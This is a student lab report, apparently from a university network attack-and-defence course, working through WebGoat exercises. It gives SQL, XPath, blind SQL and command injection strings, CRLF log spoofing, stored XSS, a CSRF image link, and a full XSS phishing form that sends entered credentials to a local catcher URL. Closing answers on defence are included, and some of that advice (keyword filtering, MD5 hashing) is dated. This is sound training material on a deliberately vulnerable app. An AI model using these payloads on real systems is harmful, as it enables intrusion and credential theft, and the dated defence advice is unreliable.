2017-2018-2 20155225《网络对抗技术》实验九 Web安全基础

WebGoat

1.String SQL Injection

题目是想办法得到数据库所有人的信用卡号,用Smith登录后,得到Smith的两个信用卡号,如图

image

但如何才能得到所有人的信用卡号呢?

只需要输入' or 1 = ' 1,这样构造可以将引号闭合,再or上一个永真式,就能屏蔽掉前面的条件。

2、Log Spoofing

在User Name中以这种格式注入:Use CR (%0d) and LF (%0a) for a new line。比如输入20155225jzy%0d%0aLogin succeeded !

image

3、Numeric SQL Injection

这个题目也是要得到数据库全部天气数据,但没有一个可以输入的文本框怎么办呢?

image

查看页面源代码,在输入下拉框中,向后台提交value值,所以只需在后面加上or 1=1 永真式即可。

image

登录成功:

image

4、Command Injection

还是可以用修改页面源码的方法。在后面加上能够在目标主机上执行的命令:"& netstat -an & ipconfig"

image

可见直接改变了下拉框选项,里面出现了我们希望系统执行的命令。

image

成功:

image

5、Stage 1:String SQL Injection

开始我们想在密码框输入' or 1=1 --注入,但是失败了。查看网页源码发现,对密码框输入进行了限制。

image

修改密码限制之后,成功登录:

image

6、XPATH Injection

这是一个职员私人数据查询系统,我们的目的是看到其他职员的信息。

image

XPath 是一门在 XML 文档中查找信息的语言。除了在输入1 = 1以外,还需要选择一个XML节点,输入'a' = 'a。

所以只需在User Name输入20155225jzy' or 1=1 or 'a'='a

在Password输入20155225jzy即可成功获得所用员工信息。

7、Blind String SQL Injection

image

使用盲字符串SQL注入进行爆破,感觉这个好难啊,不太明白逻辑,所以去看了一下答案。

解决方法是通过将一个布尔表达式注入到预脚本SQL查询中来找出名称。

首先是和H比较:101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'H' );返回false并显示无效账号。

变成< 'L' 会返回true,这样我们就知道这个字母是在H和Lz之间。再经过几次查询就能判断出第一个字母是J。

同理,最终可以推出用户名是Jill。

8、Phishing with XSS

image

用XSS和HTML注入,在搜索框注入下面这段html:

</form>
  <script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " +                         document.phish.pass.value);
} 
  </script>
<form name="phish">
<br>
<br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

然后会看到一个可以输入用户名密码的表单,直接点击登录。WebGoat会将输入的信息捕获并反馈回来,攻击成功。

9、Stored XSS Attacks

这是存储型XSS攻击。在Title里输入学号,在Message里输入<script>alert("20155225 attack succeed!");</script>攻击成功。

image

10、Cross Site Request Forgery(CSRF)

写一个URL诱使其他用户点击,从而触发CSRF攻击,我们可以以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件。如图:

image

image

基础问题回答

1、SQL注入攻击原理,如何防御

SQL注入攻击值得是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是SQL语法里的一下组合,

通过执行SQL语句进执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。

预防方法:

1、首先要对输入的数据进行过滤,将常见的sql语句的关键词:select or ' " 等字符进行过滤。

2、对在数据库中对密码进行加密,验证登陆的时候先将 密码进行加密再与数据库中加密的密码进行对比,若此时一致则基本是安全的。

3、对数据库中密码采用常用的MD5加密时尽量在字符串的前边和后边加上指定字符后在进行加密,这样即便是看到了数据库也很难破解密码。

2、XSS攻击的原理,如何防御

XSS是Cross-site scripting,为了和CSS层叠样式表区分所以取名XSS。是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。  

  XSS攻击的主要目的则是,想办法获取目标攻击网站的cookie,因为有了cookie相当于有了seesion,有了这些信息就可以在任意能接进互联网的pc登陆该网站,并以其他人的生份登陆,做一些破坏。预防措施,防止下发界面显示html标签,把</>等符号转义
  
  预防方法:
  
  当恶意代码值被作为某一标签的内容显示:在不需要html输入的地方对html 标签及一些特殊字符( ” < > & 等等 )做过滤,将其转化为不被浏览器解释执行的字符。

当恶意代码被作为某一标签的属性显示,通过用 “将属性截断来开辟新的属性或恶意方法:属性本身存在的 单引号和双引号都需要进行转码;对用户输入的html 标签及标签属性做白名单过滤,也可以对一些存在漏洞的标签和属性进行专门过滤。

3、XSRF攻击原理,如何防御

image

预防方法:

(1).Cookie Hashing(所有表单都包含同一个伪随机值):

这可能是最简单的解决方案了,因为攻击者不能获得第三方的Cookie(理论上),所以表单中的数据也就构造失败了:在表单里增加Hash值,以认证这确实是用户发送的请求。然后在服务器端进行Hash值验证

  (2).验证码

  这个方案的思路是:每次的用户提交都需要用户在表单中填写一个图片上的随机字符串。

  (3).One-Time Tokens(不同的表单包含一个不同的伪随机值)
  

总结

通过这次实验,我了解到web攻击的一些基本内容,也感受到web安全有很广阔的探索空间,希望以后还会有机会继续学习。

posted on 2018-05-27 19:51  20155225江智宇  阅读(222)  评论(0编辑  收藏  举报